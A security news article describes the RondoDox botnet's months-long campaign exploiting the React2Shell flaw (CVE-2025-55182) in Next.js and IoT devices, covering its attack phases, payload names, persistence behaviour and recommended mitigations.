RondoDox Botnet Unleashes Havoc: Exploiting React2Shell to Seize IoT and Web Servers
A sophisticated and relentless cyber campaign, spanning nine months, has culminated in the widespread hijacking of Internet of Things (IoT) devices and web applications, enrolling them into a formidable botnet known as RondoDox. Cybersecurity researchers have recently unveiled the intricate details of this operation, highlighting its alarming scale and the critical vulnerabilities it exploits.
The Critical React2Shell Flaw: A Gateway for Attackers
At the heart of RondoDox’s latest surge is the exploitation of the newly disclosed React2Shell vulnerability (CVE-2025-55182), boasting a maximum CVSS score of 10.0. This critical flaw, affecting React Server Components (RSC) and Next.js, grants unauthenticated attackers the ability to execute remote code on vulnerable systems. As of December 2025, CloudSEK’s analysis confirms React2Shell as the primary initial access vector for the botnet.
The scale of this vulnerability is staggering. Data from the Shadowserver Foundation indicates approximately 90,300 instances remain susceptible to React2Shell as of December 31, 2025. A significant majority, 68,400 instances, are located in the U.S., followed by Germany (4,300), France (2,800), and India (1,500), underscoring a global threat landscape.
RondoDox: A Botnet’s Evolution and Expansion
Emerging in early 2025, the RondoDox botnet has demonstrated remarkable adaptability and a continuous drive for expansion. It has systematically broadened its arsenal by incorporating new N-day security vulnerabilities, including CVE-2023-1389 and CVE-2025-24893, alongside the potent React2Shell exploit. The abuse of React2Shell by RondoDox was previously flagged by leading cybersecurity firms such as Darktrace, Kaspersky, and VulnCheck, signaling its growing notoriety.
Anatomy of an Attack: Three Distinct Phases
The RondoDox campaign is meticulously structured, having progressed through three distinct phases prior to the widespread exploitation of CVE-2025-55182:
- March – April 2025: Initial Reconnaissance and Manual Scanning
The threat actors began with targeted reconnaissance and manual vulnerability scanning to identify potential targets. - April – June 2025: Daily Mass Probing
This phase saw a significant escalation with daily mass vulnerability probing of popular web applications like WordPress, Drupal, and Struts2, as well as IoT devices such as Wavlink routers. - July – Early December 2025: Automated Large-Scale Deployment
The campaign transitioned to an hourly, automated deployment on a massive scale, indicating a refined and efficient attack infrastructure.
Payloads, Persistence, and Preventing Reinfection
In the attacks observed in December 2025, the RondoDox operators initiated scans for vulnerable Next.js servers, subsequently attempting to deploy a suite of malicious payloads. These included cryptocurrency miners (“/nuts/poop“), a botnet loader and health checker (“/nuts/bolts“), and a Mirai botnet variant (“/nuts/x86“).
The “/nuts/bolts” component is particularly insidious. It’s engineered to terminate competing malware and coin miners, ensuring RondoDox maintains exclusive control before downloading the primary bot binary from its command-and-control (C2) server. A variant of this tool goes further, removing known botnets, Docker-based payloads, artifacts from previous campaigns, and associated cron jobs, while establishing persistence via “/etc/crontab“. CloudSEK notes its aggressive self-preservation: “It continuously scans /proc to enumerate running executables and kills non-whitelisted processes every ~45 seconds, effectively preventing reinfection by rival actors.”
Mitigating the RondoDox Threat
Given the severity and persistence of the RondoDox botnet, organizations must take immediate and decisive action:
- Patch Next.js: Update Next.js to a patched version without delay to address the React2Shell vulnerability.
- Network Segmentation: Isolate all IoT devices into dedicated VLANs to limit potential lateral movement.
- Deploy WAFs: Implement Web Application Firewalls (WAFs) to detect and block malicious traffic targeting web applications.
- Monitor Processes: Continuously monitor for suspicious process execution on servers and IoT devices.
- Block C2 Infrastructure: Block known command-and-control (C2) infrastructure associated with RondoDox.
The RondoDox botnet serves as a stark reminder of the evolving threat landscape and the critical importance of proactive cybersecurity measures. Staying vigilant and implementing robust defenses are paramount to protecting digital assets from such sophisticated attacks.
For more details, visit our website.
Source: Link
